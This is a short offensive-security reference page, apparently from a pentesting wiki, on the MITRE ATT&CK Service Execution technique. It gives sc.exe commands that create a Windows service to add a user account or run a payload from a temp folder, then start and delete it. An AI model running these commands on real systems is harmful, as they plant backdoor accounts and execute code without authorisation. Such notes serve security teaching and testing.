Services

MITRE ATT&CK™ System Services - Service Execution - Technique T1569.002

Theory

Windows services can also be leveraged to run arbitrary commands since they execute a command when started.

Practice

On windows, we can use the built in sc.exe binary to remotely interact with services

#Create a service
sc.exe create MyService binPath= "net user munra Pass123 /add" start= auto
sc.exe create MyService binPath= "C:\Windows\TEMP\payload.exe" start= auto

#Start a service
sc.exe start MyService

#Stop and delete a remote service
sc.exe stop MyService
sc.exe delete MyService

You may want to check this page for remote services execution :

pageServices (SVCCTL)

Last updated 11 months ago